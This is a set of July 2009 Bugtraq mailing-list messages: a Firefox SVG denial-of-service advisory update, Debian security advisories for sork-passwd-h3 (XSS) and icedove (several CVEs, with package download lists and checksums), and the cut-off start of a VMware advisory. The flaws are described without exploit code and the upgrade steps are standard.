Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 4773 invoked from network); 10 Jul 2009 15:36:24 -0000
Resent-Cc: recipient list not shown: ;
Resent-Date: Fri, 10 Jul 2009 09:36:43 -0600
Resent-Message-Id: <200907101536.n6AFahch031856@mx1.securityfocus.com>
Date: Fri, 10 Jul 2009 17:36:27 +0200
From: Thierry Zoller <Thierry@zoller.lu>
X-Priority: 3 (Normal)
Message-ID: <843132183.20090710173627@Zoller.lu>
To: bugtraq <bugtraq@securityfocus.com>,
full-disclosure <full-disclosure@lists.grok.org.uk>, <nvd@nist.gov>,
<cve@mitre.org>
Subject: Update: [TZO-26-2009] Firefox (all?) Denial of Service through unclamped loop (SVG)
Resent-From: Thierry Zoller <Thierry@zoller.lu>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-15
Content-Transfer-Encoding: 8bit
Status: RO


Update:
-------
Patch was ineffective,  Length2 was fixed and both
SVGNumber and SVGNumber2, but no SVGLength.

Affected products :
- All firefox versions below 3.5



From - Mon Jul 13 18:03:47 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00008c5b
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40819-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id E8F04EC0F7
for <lists@securityspace.com>; Mon, 13 Jul 2009 10:14:00 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 93216236F43; Mon, 13 Jul 2009 08:08:22 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 20419 invoked from network); 11 Jul 2009 07:24:42 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <white@debian.org>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Flag: NO
X-Spam-Score: -9.7
X-Spam-Level: 
X-Spam-Status: No, score=-9.7 tagged_above=-10000 required=5.3
tests=[BAYES_00=-2, IMPRONONCABLE_1=1, IMPRONONCABLE_2=1,
LDO_WHITELIST=-5, MURPHY_WRONG_WORD1=0.1, MURPHY_WRONG_WORD2=0.2,
PGPSIGNATURE=-5] autolearn=ham
X-policyd-weight:  DYN_NJABL=SKIP(0) NOT_IN_SBL_XBL_SPAMHAUS=-1.5 NOT_IN_BL_NJABL=-1.5 DSBL_ORG=SKIP(0) CL_IP_EQ_HELO_MX=-3.1 (check from: .debian. - helo: .apu.snow-crash. - helo-domain: .snow-crash.)  FROM/MX_MATCHES_NOT_HELO(DOMAIN)=0; rate: -6.1
Message-Id: <20090711072454.6518FB10017@hannah.localdomain>
Date: Sat, 11 Jul 2009 17:24:54 +1000 (EST)
From: white@debian.org (Steffen Joeris)
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1829-1] New sork-passwd-h3 packages fix cross-site scripting
Priority: urgent
Resent-Message-ID: <d2g1fh8973P.A.MjH.T5DWKB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Sat, 11 Jul 2009 07:25:07 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1829-1                  security@debian.org
http://www.debian.org/security/                      Steffen Joeris
July 11, 2009                         http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : sork-passwd-h3
Vulnerability  : insufficient input sanitising
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2009-2360
Debian Bug     : 536554


It was discovered that sork-passwd-h3, a Horde3 module for users to
change their password, is prone to a cross-site scripting attack via the
backend parameter.


For the oldstable distribution (etch), this problem has been fixed in
version 3.0-2+etch1.

For the stable distribution (lenny), this problem has been fixed in
version 3.0-2+lenny1.

For the testing distribution (squeeze), this problem will be fixed soon.

For the unstable distribution (sid), this problem has been fixed in
version 3.1-1.1.


We recommend that you upgrade your sork-passwd-h3 packages.


Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Debian (oldstable)
- ------------------

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/s/sork-passwd-h3/sork-passwd-h3_3.0.orig.tar.gz
    Size/MD5 checksum:   966096 ca5612500c91c4ef3c838e8e94376332
  http://security.debian.org/pool/updates/main/s/sork-passwd-h3/sork-passwd-h3_3.0-2+etch1.dsc
    Size/MD5 checksum:      722 9c114c8b4abf6db6b91a94f4e0359f77
  http://security.debian.org/pool/updates/main/s/sork-passwd-h3/sork-passwd-h3_3.0-2+etch1.diff.gz
    Size/MD5 checksum:     8070 f8bdcfd6195df252914144f2a9e78869

Architecture independent packages:

  http://security.debian.org/pool/updates/main/s/sork-passwd-h3/sork-passwd-h3_3.0-2+etch1_all.deb
    Size/MD5 checksum:   936654 8827158aa7959c230edd2f264061309d


Debian GNU/Linux 5.0 alias lenny
- --------------------------------

Debian (stable)
- ---------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/s/sork-passwd-h3/sork-passwd-h3_3.0-2+lenny1.dsc
    Size/MD5 checksum:     1134 21cddfb0875a3513716238b2482c8f48
  http://security.debian.org/pool/updates/main/s/sork-passwd-h3/sork-passwd-h3_3.0.orig.tar.gz
    Size/MD5 checksum:   966096 ca5612500c91c4ef3c838e8e94376332
  http://security.debian.org/pool/updates/main/s/sork-passwd-h3/sork-passwd-h3_3.0-2+lenny1.diff.gz
    Size/MD5 checksum:     8075 ac8d69e8612a96eeb18f3d68960dfaa2

Architecture independent packages:

  http://security.debian.org/pool/updates/main/s/sork-passwd-h3/sork-passwd-h3_3.0-2+lenny1_all.deb
    Size/MD5 checksum:   936656 b931e5db33decf642d8911f01b5656a1


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkpYPGIACgkQ62zWxYk/rQcNnQCgkfrojthpvgPbe0LqBvmh0y5A
8mgAn2+JAEoDspL4DLr3MO527dYAh5lN
=YZe4
-----END PGP SIGNATURE-----

From - Mon Jul 13 18:03:47 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00008c5c
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40820-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id C7928EC0F7
for <lists@securityspace.com>; Mon, 13 Jul 2009 10:26:56 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id B9F66237086; Mon, 13 Jul 2009 08:10:52 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 16052 invoked from network); 12 Jul 2009 10:24:22 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <white@debian.org>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Flag: NO
X-Spam-Score: -10.68
X-Spam-Level: 
X-Spam-Status: No, score=-10.68 tagged_above=-10000 required=5.3
tests=[BAYES_00=-2, FVGT_m_MULTI_ODD=0.02, IMPRONONCABLE_2=1,
LDO_WHITELIST=-5, MURPHY_WRONG_WORD1=0.1, MURPHY_WRONG_WORD2=0.2,
PGPSIGNATURE=-5] autolearn=ham
X-policyd-weight: using cached result; rate: -6.1
Message-Id: <20090712102443.E0152AB0062@hannah.localdomain>
Date: Sun, 12 Jul 2009 20:24:43 +1000 (EST)
From: white@debian.org (Steffen Joeris)
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1753-2] End-of-life announcement for icedove in oldstable
Priority: urgent
Resent-Message-ID: <Y-yRr2ho9JD.A.TIE.9nbWKB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Sun, 12 Jul 2009 10:25:01 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1753-2                  security@debian.org
http://www.debian.org/security/                       Steffen Joeris
July 12, 2009                        http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : icedove

As indicated in the Etch release notes, security support for the
Icedove version in the oldstable distribution (Etch) needed to be
stopped before the end of the regular security maintenance life cycle.

You are strongly encouraged to upgrade to stable or switch to a still
supported email client.

- ------------------------------------------------------------------------
Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkpZucIACgkQ62zWxYk/rQdfLgCguuPwdUJ/hn7LcEIavOMIuRDw
C5MAniPybl4km9FfxojBdeglGm9hr7oj
=YZ6+
-----END PGP SIGNATURE-----

From - Mon Jul 13 18:03:47 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00008c5e
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40821-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 5DD5EEC0F7
for <lists@securityspace.com>; Mon, 13 Jul 2009 10:42:06 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id EC986237436; Mon, 13 Jul 2009 08:11:02 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 16578 invoked from network); 12 Jul 2009 11:20:36 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <white@debian.org>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Flag: NO
X-Spam-Score: -9.58
X-Spam-Level: 
X-Spam-Status: No, score=-9.58 tagged_above=-10000 required=5.3
tests=[BAYES_00=-2, FOURLA=0.1, FVGT_m_MULTI_ODD=0.02,
IMPRONONCABLE_1=1, IMPRONONCABLE_2=1, LDO_WHITELIST=-5,
MURPHY_WRONG_WORD1=0.1, MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5]
autolearn=ham
X-policyd-weight: using cached result; rate:hard: -6.1
Message-Id: <20090712112102.13051AB0062@hannah.localdomain>
Date: Sun, 12 Jul 2009 21:21:02 +1000 (EST)
From: white@debian.org (Steffen Joeris)
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1830-1] New icedove packages fix several vulnerabilities
Priority: urgent
Resent-Message-ID: <lpoKfUJYDhL.A.I-E.qccWKB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Sun, 12 Jul 2009 11:21:14 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1830-1                  security@debian.org
http://www.debian.org/security/                      Steffen Joeris
July 12, 2009                         http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : icedove                                                                                                                                                        
Vulnerability  : several vulnerabilities                                                                                                                                        
Problem type   : remote                                                                                                                                                         
Debian-specific: no                                                                                                                                                             
CVE IDs        : CVE-2009-0040 CVE-2009-0352 CVE-2009-0353 CVE-2009-0652                                                                                                        
CVE-2009-0771 CVE-2009-0772 CVE-2009-0773 CVE-2009-0774 CVE-2009-0776                                                                                                           
CVE-2009-1302 CVE-2009-1303 CVE-2009-1307 CVE-2009-1832 CVE-2009-1392                                                                                                           
CVE-2009-1836 CVE-2009-1838 CVE-2009-1841                                                                                                                                       


Several remote vulnerabilities have been discovered in the Icedove
mail client, an unbranded version of the Thunderbird mail client. The
Common Vulnerabilities and Exposures project identifies the following
problems:                                                            

CVE-2009-0040

The execution of arbitrary code might be possible via a crafted PNG file
that triggers a free of an uninitialized pointer in (1) the png_read_png
function, (2) pCAL chunk handling, or (3) setup of 16-bit gamma tables. 
(MFSA 2009-10)                                                          

CVE-2009-0352

It is possible to execute arbitrary code via vectors related to the
layout engine. (MFSA 2009-01)                                      

CVE-2009-0353

It is possible to execute arbitrary code via vectors related to the
JavaScript engine. (MFSA 2009-01)                                  

CVE-2009-0652

Bjoern Hoehrmann and Moxie Marlinspike discovered a possible spoofing
attack via Unicode box drawing characters in internationalized domain
names. (MFSA 2009-15)                                                

CVE-2009-0771

Memory corruption and assertion failures have been discovered in the
layout engine, leading to the possible execution of arbitrary code. 
(MFSA 2009-07)                                                      

CVE-2009-0772

The layout engine allows the execution of arbitrary code ia vectors
related to nsCSSStyleSheet::GetOwnerNode, events, and garbage      
collection. (MFSA 2009-07)                                         

CVE-2009-0773

The JavaScript engine is prone to the execution of arbitrary code via
several vectors. (MFSA 2009-07)                                      

CVE-2009-0774

The layout engine allows the execution of arbitrary code via vectors
related to gczeal. (MFSA 2009-07)                                   

CVE-2009-0776

Georgi Guninski discovered that it is possible to obtain xml data via
an issue related to the nsIRDFService. (MFSA 2009-09)                

CVE-2009-1302

The browser engine is prone to a possible memory corruption via several
vectors. (MFSA 2009-14)                                                

CVE-2009-1303

The browser engine is prone to a possible memory corruption via the
nsSVGElement::BindToTree function. (MFSA 2009-14)                  

CVE-2009-1307

Gregory Fleischer discovered that it is possible to bypass the Same
Origin Policy when opening a Flash file via the view-source: scheme.
(MFSA 2009-17)                                                      

CVE-2009-1832

The possible arbitrary execution of code was discovered via vectors
involving "double frame construction." (MFSA 2009-24)              

CVE-2009-1392

Several issues were discovered in the browser engine as used by icedove,
which could lead to the possible execution of arbitrary code.           
(MFSA 2009-24)                                                          

CVE-2009-1836

Shuo Chen, Ziqing Mao, Yi-Min Wang and Ming Zhang reported a potential
man-in-the-middle attack, when using a proxy due to insufficient checks
on a certain proxy response. (MFSA 2009-27)

CVE-2009-1838

moz_bug_r_a4 discovered that it is possible to execute arbitrary
JavaScript with chrome privileges due to an error in the
garbage-collection implementation. (MFSA 2009-29)

CVE-2009-1841

moz_bug_r_a4 reported that it is possible for scripts from page content
to run with elevated privileges and thus potentially executing arbitrary
code with the object's chrome privileges. (MFSA 2009-32)

No CVE id yet

Bernd Jendrissek discovered a potentially exploitable crash when viewing
a multipart/alternative mail message with a text/enhanced part.
(MFSA 2009-33)


For the stable distribution (lenny), these problems have been fixed in
version 2.0.0.22-0lenny1.

As indicated in the Etch release notes, security support for the
Mozilla products in the oldstable distribution needed to be stopped
before the end of the regular Etch security maintenance life cycle.
You are strongly encouraged to upgrade to stable or switch to a still
supported mail client.

For the testing (squeeze) distribution these problems will be fixed soon.

For the unstable distribution (sid), these problems have been fixed in
version 2.0.0.22-1.


We recommend that you upgrade your icedove packages.


Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 5.0 alias lenny
- --------------------------------

Debian (stable)
- ---------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/i/icedove/icedove_2.0.0.22-0lenny1.dsc
    Size/MD5 checksum:     1667 e373157340de8a93d36e6210afe2f345
  http://security.debian.org/pool/updates/main/i/icedove/icedove_2.0.0.22-0lenny1.diff.gz
    Size/MD5 checksum:   118782 0f1d8098818180a72820438adfa79436
  http://security.debian.org/pool/updates/main/i/icedove/icedove_2.0.0.22.orig.tar.gz
    Size/MD5 checksum: 36965969 8e0ffafaece0680a42c0cb11ff34c64a

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/i/icedove/icedove_2.0.0.22-0lenny1_alpha.deb
    Size/MD5 checksum: 13441166 eb9f665e0e18b36daf2542288567bc0e
  http://security.debian.org/pool/updates/main/i/icedove/icedove-dbg_2.0.0.22-0lenny1_alpha.deb
    Size/MD5 checksum: 57359422 0e1af2a3bfd6d7f1d66840a9d9bbdc3c
  http://security.debian.org/pool/updates/main/i/icedove/icedove-gnome-support_2.0.0.22-0lenny1_alpha.deb
    Size/MD5 checksum:    60844 e782984c2808227c747a7930c70455d5
  http://security.debian.org/pool/updates/main/i/icedove/icedove-dev_2.0.0.22-0lenny1_alpha.deb
    Size/MD5 checksum:  3723116 f35a203a81b097f19d67a454df6eae3f

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/i/icedove/icedove-dbg_2.0.0.22-0lenny1_amd64.deb
    Size/MD5 checksum: 57569412 b76a17f1fd3c76328802ffe5b5210d29
  http://security.debian.org/pool/updates/main/i/icedove/icedove_2.0.0.22-0lenny1_amd64.deb
    Size/MD5 checksum: 12338088 bae6d2708c11bcb1fd169005ff561b14
  http://security.debian.org/pool/updates/main/i/icedove/icedove-gnome-support_2.0.0.22-0lenny1_amd64.deb
    Size/MD5 checksum:    58854 28bef0b2e39a58e5a53fcabce5d02444
  http://security.debian.org/pool/updates/main/i/icedove/icedove-dev_2.0.0.22-0lenny1_amd64.deb
    Size/MD5 checksum:  3704724 bb42d33cac6a532dcfd348f2909a7a1f

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/i/icedove/icedove_2.0.0.22-0lenny1_arm.deb
    Size/MD5 checksum: 10924558 a6377d02484cdf7c832ea949e17b0b5b
  http://security.debian.org/pool/updates/main/i/icedove/icedove-dbg_2.0.0.22-0lenny1_arm.deb
    Size/MD5 checksum: 56478312 4a80f7a148b3c95a6e70e493972d4689
  http://security.debian.org/pool/updates/main/i/icedove/icedove-gnome-support_2.0.0.22-0lenny1_arm.deb
    Size/MD5 checksum:    53392 d7c8ba83bd82e3e37902881056d5cc19
  http://security.debian.org/pool/updates/main/i/icedove/icedove-dev_2.0.0.22-0lenny1_arm.deb
    Size/MD5 checksum:  3929498 9c800bff03993a158efc6b686d1808eb

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/i/icedove/icedove_2.0.0.22-0lenny1_hppa.deb
    Size/MD5 checksum: 13934564 5f5d936cead750583036c15e4f12ee84
  http://security.debian.org/pool/updates/main/i/icedove/icedove-dbg_2.0.0.22-0lenny1_hppa.deb
    Size/MD5 checksum: 58508036 47a7976a3e62a96b0a30ba308828ceca
  http://security.debian.org/pool/updates/main/i/icedove/icedove-gnome-support_2.0.0.22-0lenny1_hppa.deb
    Size/MD5 checksum:    60260 43957fc0f5fd4164b68dc569553fcd0d
  http://security.debian.org/pool/updates/main/i/icedove/icedove-dev_2.0.0.22-0lenny1_hppa.deb
    Size/MD5 checksum:  3944546 4e30f36cd2bbbcdd74213392116ddad5

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/i/icedove/icedove-dev_2.0.0.22-0lenny1_i386.deb
    Size/MD5 checksum:  3934604 336b57d8a95a52cffc2c07b5ed605c74
  http://security.debian.org/pool/updates/main/i/icedove/icedove_2.0.0.22-0lenny1_i386.deb
    Size/MD5 checksum: 10924508 b4cf9766cac84f9d21defc2ea4e1d1bc
  http://security.debian.org/pool/updates/main/i/icedove/icedove-gnome-support_2.0.0.22-0lenny1_i386.deb
    Size/MD5 checksum:    54082 86ac55697cfc6abc6a719be26c5fcb48
  http://security.debian.org/pool/updates/main/i/icedove/icedove-dbg_2.0.0.22-0lenny1_i386.deb
    Size/MD5 checksum: 56523330 8f925c6cea9ec7e628e05a8079dd30ad

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/i/icedove/icedove_2.0.0.22-0lenny1_ia64.deb
    Size/MD5 checksum: 16521158 4271ac14c8b4bc91d606cc2848d32a59
  http://security.debian.org/pool/updates/main/i/icedove/icedove-gnome-support_2.0.0.22-0lenny1_ia64.deb
    Size/MD5 checksum:    66018 4659cf77ec8dc16df43dc17f9fafd30b
  http://security.debian.org/pool/updates/main/i/icedove/icedove-dev_2.0.0.22-0lenny1_ia64.deb
    Size/MD5 checksum:  3756644 ffe54230f44502f546db8cabf5f90c8b
  http://security.debian.org/pool/updates/main/i/icedove/icedove-dbg_2.0.0.22-0lenny1_ia64.deb
    Size/MD5 checksum: 57191766 fd750b5ec53e9b271e6a9a6b6a8c7592

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/i/icedove/icedove-dbg_2.0.0.22-0lenny1_mips.deb
    Size/MD5 checksum: 59425636 e903cd19e5c016e0a8b2fb7b152db5ec
  http://security.debian.org/pool/updates/main/i/icedove/icedove-gnome-support_2.0.0.22-0lenny1_mips.deb
    Size/MD5 checksum:    56028 e1d9c13acc9d8e251221b14c930b5172
  http://security.debian.org/pool/updates/main/i/icedove/icedove_2.0.0.22-0lenny1_mips.deb
    Size/MD5 checksum: 11674728 83b91e8518ee428dc6d7cb9566ba54ff
  http://security.debian.org/pool/updates/main/i/icedove/icedove-dev_2.0.0.22-0lenny1_mips.deb
    Size/MD5 checksum:  3707428 18ab15666626952530e1819732475f96

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/i/icedove/icedove-gnome-support_2.0.0.22-0lenny1_mipsel.deb
    Size/MD5 checksum:    55732 c368bc2d18dac3ec865d83b1677efcca
  http://security.debian.org/pool/updates/main/i/icedove/icedove-dev_2.0.0.22-0lenny1_mipsel.deb
    Size/MD5 checksum:  3707400 03ba8ac5d466bed85ac96ec188a3ec61
  http://security.debian.org/pool/updates/main/i/icedove/icedove_2.0.0.22-0lenny1_mipsel.deb
    Size/MD5 checksum: 11438296 2b7ea15c0e698b5a5cdc7445cfbecb66
  http://security.debian.org/pool/updates/main/i/icedove/icedove-dbg_2.0.0.22-0lenny1_mipsel.deb
    Size/MD5 checksum: 57501964 9c22fe40c2154e7714b4c852751265bd

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/i/icedove/icedove-dev_2.0.0.22-0lenny1_powerpc.deb
    Size/MD5 checksum:  3708088 fe79a3b35ecdcf87602f4dc69e568afd
  http://security.debian.org/pool/updates/main/i/icedove/icedove-gnome-support_2.0.0.22-0lenny1_powerpc.deb
    Size/MD5 checksum:    57232 1e65aee9e96495ae8191d6442b17f96d
  http://security.debian.org/pool/updates/main/i/icedove/icedove-dbg_2.0.0.22-0lenny1_powerpc.deb
    Size/MD5 checksum: 59499604 27e7f1250d8e1ae86a2db606dbecb42d
  http://security.debian.org/pool/updates/main/i/icedove/icedove_2.0.0.22-0lenny1_powerpc.deb
    Size/MD5 checksum: 12062484 3f15804556ea0aa9de21177937be0f71

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/i/icedove/icedove_2.0.0.22-0lenny1_s390.deb
    Size/MD5 checksum: 12795730 bea3550a60db31c288ee9f7acc1dbe56
  http://security.debian.org/pool/updates/main/i/icedove/icedove-dbg_2.0.0.22-0lenny1_s390.deb
    Size/MD5 checksum: 58573916 62b1aed5e834bf7140649525d3431ba9
  http://security.debian.org/pool/updates/main/i/icedove/icedove-dev_2.0.0.22-0lenny1_s390.deb
    Size/MD5 checksum:  3707716 e12ede189e11a59e5c9a9bd689038ca1
  http://security.debian.org/pool/updates/main/i/icedove/icedove-gnome-support_2.0.0.22-0lenny1_s390.deb
    Size/MD5 checksum:    59444 e3ebdc37058c6da4039e6994afefab33

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/i/icedove/icedove-dbg_2.0.0.22-0lenny1_sparc.deb
    Size/MD5 checksum: 56338680 b95f62bf55eb01eb0339ff5ac7ae680f
  http://security.debian.org/pool/updates/main/i/icedove/icedove-gnome-support_2.0.0.22-0lenny1_sparc.deb
    Size/MD5 checksum:    53890 043f1ac4e04a1eda27186a9c282baa15
  http://security.debian.org/pool/updates/main/i/icedove/icedove_2.0.0.22-0lenny1_sparc.deb
    Size/MD5 checksum: 11083222 2a3c3d75b1273a1dcdd391b28cec1d75
  http://security.debian.org/pool/updates/main/i/icedove/icedove-dev_2.0.0.22-0lenny1_sparc.deb
    Size/MD5 checksum:  3688958 ec9cbf4f683c04496efa8d8089cb72e9


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkpZvFYACgkQ62zWxYk/rQdk3ACeM+K2s3rv3+njevBEM0AH70At
K9MAn3sYPsios3JrLZKYJw+awrzMNzfg
=qMRL
-----END PGP SIGNATURE-----

From - Mon Jul 13 18:03:48 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00008c62
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40818-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 4F723EC0D2
for <lists@securityspace.com>; Mon, 13 Jul 2009 11:12:51 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 721611436FA; Mon, 13 Jul 2009 08:08:33 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 14114 invoked from network); 11 Jul 2009 00:06:52 -0000
Message-ID: <4A57D7B3.4090106@vmware.com>
Date: Fri, 10 Jul 2009 17:07:15 -0700
From: VMware Security team <security@vmware.com>
User-Agent: Thunderbird 2.0.0.22 (Windows/20090605)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: VMSA-2009-0009 ESX Service Console updates for udev, sudo, and curl
X-Enigmail-Version: 0.95.7
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -----------------------------------------------------------------------
